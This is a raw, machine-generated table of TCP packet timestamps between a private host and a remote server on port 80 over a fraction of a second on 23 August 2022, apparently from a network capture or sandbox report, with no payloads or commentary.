Aug 23, 2022 03:43:01.075233936 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.075258017 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.075275898 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.075314999 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.075378895 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.075392008 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.082058907 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.082106113 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.082146883 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.082150936 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.082174063 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.082236052 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.082305908 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.082360983 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.087085962 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.087133884 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.087168932 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.087174892 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.087208033 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.087215900 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.087228060 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.087260008 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.087275028 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.087302923 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.087316990 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.087343931 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.087357998 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.087404966 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.087450981 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.087474108 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.087488890 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.087507010 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.087529898 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.087574005 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.087589025 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.087615013 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.087655067 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.087666035 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.087704897 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.090073109 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.090176105 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.090186119 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.090243101 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.090307951 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.090308905 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.090373039 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.090431929 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.090437889 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.090512037 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.090523958 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.090573072 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.090739012 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.090825081 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.090830088 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.090898991 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.090960026 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.090964079 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.091031075 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.091053009 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.091104031 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.091160059 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.091171026 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.091236115 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.091295958 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.091533899 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.091636896 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.091681004 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.091696978 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.091722965 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.091732979 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.091763973 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.091801882 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.091825008 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.091842890 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.091882944 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.091900110 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.091923952 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.091932058 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.091964960 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.092034101 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.105803967 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.106409073 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.144171953 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.144310951 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.144395113 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.144453049 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.144469976 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.144506931 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.144509077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.144562960 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.144573927 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.144623995 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.144623995 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.144695044 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.145236015 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.145382881 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.145458937 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.145478964 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.145529985 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.145622015 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.145682096 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.145724058 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.145735979 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.145741940 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.145790100 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.145792961 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.145843983 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.145845890 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.145898104 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.145904064 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.145953894 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.145987034 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.146008015 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.146020889 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.146061897 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.146066904 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.146121979 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.146174908 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.146183968 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.146229029 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.146292925 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.146300077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.146358967 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.146450043 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.146503925 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.146570921 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.146578074 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.146632910 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.146687984 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.146702051 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.146745920 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.146797895 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.146807909 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.146851063 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.146851063 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.146904945 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.146955013 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.146966934 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.147012949 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.147077084 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.147104979 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.147130013 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.147130966 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.147185087 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.147233963 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.147248983 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.147291899 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.147382021 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.147433996 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.147481918 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.147528887 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.147573948 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.147622108 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.147669077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.147716045 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.147783041 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.147814035 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.147830963 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.147885084 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.147938967 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.147991896 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148046017 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148099899 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148149967 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148200989 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148252964 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148303986 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148355007 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148359060 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.148377895 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.148382902 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.148386955 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.148391008 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.148396015 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.148400068 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.148420095 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148432016 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.148484945 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148539066 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148546934 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.148591995 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.148592949 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148644924 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148696899 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148699999 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.148746014 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148797989 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148802042 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.148850918 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148854017 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.148904085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148957014 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.148966074 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.149055004 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.149108887 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.149125099 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.149171114 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.149199009 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.149235010 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.149286985 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.149291039 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.149339914 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.149390936 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.149391890 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.149446011 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.149498940 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.149501085 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.149566889 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.149616003 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.149617910 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.149672031 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.149723053 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.149724007 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.149772882 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.149775982 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.149827957 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.149880886 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.149887085 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.149934053 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.149986029 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.149987936 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.150038958 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.150087118 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.150089979 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.150137901 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.150145054 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.150197029 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.150249004 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.150264025 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.150316000 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.150367022 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.150372982 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.150419950 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.150470972 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.150471926 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.150525093 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.150588989 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.150635958 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.150645971 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.150648117 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.150696993 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.150698900 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.150803089 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.150825977 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.150842905 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.150851011 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.150882959 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.150923014 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.150929928 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.150960922 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151001930 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151006937 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.151041985 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151045084 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.151094913 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151141882 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.151146889 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151195049 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151252985 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151256084 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.151293993 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151333094 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151343107 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.151398897 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151401043 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.151442051 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151482105 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151490927 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.151524067 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151576042 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.151587009 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151647091 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151691914 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.151704073 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151745081 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.151762962 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151822090 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151865959 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.151880980 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151940107 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.151983023 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152014971 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152031898 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152055025 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152055025 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152097940 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152138948 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152139902 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152178049 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152219057 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152228117 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152260065 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152261019 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152301073 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152339935 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152348995 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152379990 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152420998 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152429104 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152462959 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152477026 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152503967 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152506113 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152544022 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152585983 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152591944 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152620077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152637959 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152657032 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152663946 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152677059 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152683020 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152697086 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152712107 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152714014 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152728081 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152733088 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152746916 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152753115 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152764082 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152770996 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152781010 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152789116 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152800083 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152807951 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152821064 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152827978 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152832985 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152848005 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152857065 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152865887 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.152868986 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.152884960 CEST	80	49812	135.181.104.248	192.168.2.3
